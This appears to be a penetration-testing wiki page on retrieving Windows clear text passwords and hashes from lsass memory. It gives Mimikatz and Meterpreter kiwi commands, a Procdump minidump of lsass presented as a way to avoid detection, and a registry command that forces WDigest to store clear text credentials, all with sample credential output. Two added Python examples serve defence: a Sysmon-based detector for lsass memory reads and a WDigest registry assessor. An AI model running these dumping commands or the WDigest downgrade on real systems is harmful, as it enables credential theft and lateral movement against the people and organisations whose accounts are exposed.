Retrieve Windows passwords

This page deals with retrieving Windows clear text credentials from memory and through WDigest.

Introduction

Retrieving Windows clear text passwords allows an attacker to test for password reuse, move laterally, gain a foothold on a domain, etc.

Retrieve clear text passwords from memory

Windows historically kept clear text passwords in RAM, inside the memory of the lsass process. This allows users with admin privileges to dump clear text passwords from memory with tools like Mimikatz, wce, etc.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
[...]

If you use Meterpreter on Win10 / Win2016, the only thing that works is the Kiwi WDigest module.

meterpreter > load kiwi 
Loading extension kiwi...

  .#####.   mimikatz 2.1.1 20170608 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username    Domain     Password
--------    ------     --------
(null)      (null)     (null)
WIN01$      WORKGROUP  (null)
localadmin  WIN01      L0c4l4dm1n

Microsoft disabled clear text storage in lsass starting with Win8.1 / 2012R2. The fix was backported (KB2871997) to Win7 / 8 / 2008R2 / 2012 as a registry key, but on those versions clear text storage is still enabled by default.

Minidump

To avoid being detected during assessments, we can use the Minidump technique.

It consists of dumping the lsass process on the target computer with a legitimate tool (Procdump by Sysinternals), then parsing the dump with Mimikatz locally on the attacker's machine to retrieve the passwords.

On the target machine:

C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
 
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
 
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.

To successfully extract passwords from this dump, copy it to a machine running the same major Windows version and the same architecture as the victim machine.

Then use Mimikatz:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords
 
Authentication Id : 0 ; 141237
User Name         : sekur_000
Domain            : WINDOWS-8
        msv :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        tspkg :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
        wdigest :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/

Since Mimikatz Nostalgia (2019/05/04), dumps from any Windows version/architecture can be parsed.
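Both techniques above (Mimikatz reading lsass directly, and Procdump writing a full dump of it) need a handle to lsass.exe with read access, and opening that handle is visible to endpoint telemetry no matter which tool does it. The following is an added example, not code from this page, Mimikatz, Procdump or Metasploit: a small detector that walks Sysmon Event ID 10 (ProcessAccess) records, keeps those whose target is lsass.exe and whose granted access mask includes PROCESS_VM_READ, and drops source images on an allowlist. The log lines are constructed for the example, and the allowlist is an assumption to be tuned per environment.

```python
"""Flag processes that open lsass.exe with memory-read access.

Added example for this page; the Sysmon-style lines below are
constructed, not captured from a real host, and the allowlist is an
assumption that must be tuned to the environment being monitored.
"""
import re

# Process access rights from winnt.h; dumpers typically request 0x1010
# (VM_READ | QUERY_INFORMATION) or 0x1FFFFF (PROCESS_ALL_ACCESS).
PROCESS_VM_READ = 0x0010

# Assumed allowlist of sources that legitimately read lsass on most hosts.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon ProcessAccess (Event ID 10) records, one per line,
# flattened to key=value fields. The third line mirrors the Procdump path
# used on this page.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe "
    "TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\WINDOWS\\Sysinternals\\procdump.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Users\\user\\Desktop\\mimikatz.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened record into a dict of field -> value."""
    return dict(FIELD_RE.findall(line))


def is_lsass_read(event):
    """True when the event is a ProcessAccess on lsass.exe with VM_READ set."""
    if event.get("EventID") != "10":
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    access = int(event.get("GrantedAccess", "0x0"), 16)
    return bool(access & PROCESS_VM_READ)


def find_lsass_readers(lines):
    """Return (SourceImage, GrantedAccess) for every non-allowlisted lsass reader."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if not is_lsass_read(event):
            continue
        source = event.get("SourceImage", "")
        if source.lower() in ALLOWLIST:
            continue
        hits.append((source, int(event["GrantedAccess"], 16)))
    return hits


if __name__ == "__main__":
    for source, access in find_lsass_readers(SAMPLE_EVENTS):
        print(f"lsass read by {source} (GrantedAccess=0x{access:X})")
```

Running it on the constructed input reports the Procdump and Mimikatz records and nothing else: csrss.exe is dropped by the allowlist, the svchost.exe record targets a different process, and the Event ID 1 line is not a ProcessAccess record at all. The point for a defender is that "legit tool" does not mean "silent": the dump step of the Minidump technique produces the same telemetry as a direct Mimikatz read, so the detection has to key on the handle, not on the tool's name.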

WDigest

You can force Windows to store clear text credentials in memory by simply modifying the value of the WDigest registry key. Clear text passwords will be stored again once users log on again.

To enable it, change the key value to 1:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1

To disable it, change the key value to 0:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0

For the change to take effect, the following conditions apply:

  • Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:

    • Adding requires lock

    • Removing requires signout

  • Win10:

    • Adding requires signout

    • Removing requires signout

  • Win2016:

    • Adding requires lock

    • Removing requires reboot
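Put together, the WDigest section describes a three-state situation a defender has to assess per host: the value is explicitly 1 (clear text stored), explicitly 0 (hardened), or absent, in which case the outcome depends on the Windows version (clear text on Win7 / 2008R2 / 8 / 2012, disabled by default on Win8.1 / 2012R2 and later). The following is an added example, not a Microsoft or Mimikatz tool: it parses the output of `reg query` for the UseLogonCredential value, combines it with the OS version, and reports the state, the page's own `reg add ... /d 0` command as the fix, and which action from the list above is needed for a disable to take effect. The `reg query` outputs are constructed samples in reg.exe's usual layout.

```python
"""Assess whether a host keeps clear text credentials in lsass via WDigest.

Added example for this page. Input is the OS version plus the text
printed by:
  reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential
The sample outputs below are constructed, not captured from a real host.
"""
import re

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

# The hardening command from this page (value 0 disables clear text storage).
FIX_CMD = f"reg add {WDIGEST_KEY} /v UseLogonCredential /t REG_DWORD /f /d 0"

# Versions that only received the switch via KB2871997 and still store
# clear text unless UseLogonCredential is explicitly set to 0.
CLEARTEXT_BY_DEFAULT = {"7", "2008R2", "8", "2012"}

# From the page's list: what a *disable* needs before it takes effect.
DISABLE_TAKES_EFFECT = {
    "7": "signout", "2008R2": "signout", "8": "signout", "2012": "signout",
    "8.1": "signout", "2012R2": "signout",
    "10": "signout",
    "2016": "reboot",
}

VALUE_RE = re.compile(r"UseLogonCredential\s+REG_DWORD\s+0x([0-9A-Fa-f]+)")

# Constructed reg query outputs for the three states.
ENABLED_OUTPUT = (
    "\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\n"
    "    UseLogonCredential    REG_DWORD    0x1\n"
)
DISABLED_OUTPUT = (
    "\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\n"
    "    UseLogonCredential    REG_DWORD    0x0\n"
)
ABSENT_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."


def parse_use_logon_credential(reg_query_output):
    """Return the DWORD value, or None when reg query reports it absent."""
    match = VALUE_RE.search(reg_query_output)
    return int(match.group(1), 16) if match else None


def assess_wdigest(os_version, reg_query_output):
    """Return {'cleartext': bool, 'reason': str, 'fix': str|None, 'takes_effect_after': str|None}."""
    value = parse_use_logon_credential(reg_query_output)
    after = DISABLE_TAKES_EFFECT.get(os_version)

    if value is None:
        if os_version in CLEARTEXT_BY_DEFAULT:
            return {
                "cleartext": True,
                "reason": "value absent: this version stores clear text unless "
                          "UseLogonCredential is explicitly 0 (requires KB2871997)",
                "fix": FIX_CMD,
                "takes_effect_after": after,
            }
        return {
            "cleartext": False,
            "reason": "value absent: clear text storage is off by default on this version",
            "fix": None,
            "takes_effect_after": None,
        }

    if value == 0:
        return {"cleartext": False, "reason": "UseLogonCredential=0",
                "fix": None, "takes_effect_after": None}

    return {"cleartext": True, "reason": f"UseLogonCredential={value}",
            "fix": FIX_CMD, "takes_effect_after": after}


if __name__ == "__main__":
    for version, output in [("10", ENABLED_OUTPUT), ("10", ABSENT_OUTPUT),
                            ("7", ABSENT_OUTPUT), ("2016", DISABLED_OUTPUT)]:
        result = assess_wdigest(version, output)
        print(f"Win{version}: cleartext={result['cleartext']} ({result['reason']})")
        if result["fix"]:
            print(f"  fix: {result['fix']}  (takes effect after {result['takes_effect_after']})")
```

The asymmetry worth remembering when reading the output: on Win10 an absent value is the safe state, while on Win7 / 2008R2 / 8 / 2012 the same absent value means clear text is being stored, so "the key is not there" cannot be read as "we are fine" without knowing the version. Note also that setting the value to 0 only stops new credentials from being kept; per the page's list, existing ones go away only after the signout or reboot the version requires.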

Lock, signout, and reboot from CMD

To lock a session, type:

rundll32.exe user32.dll,LockWorkStation

To signout, type:

query session
logoff <sessionToClose_Number>

To reboot, type:

shutdown /r /t 0
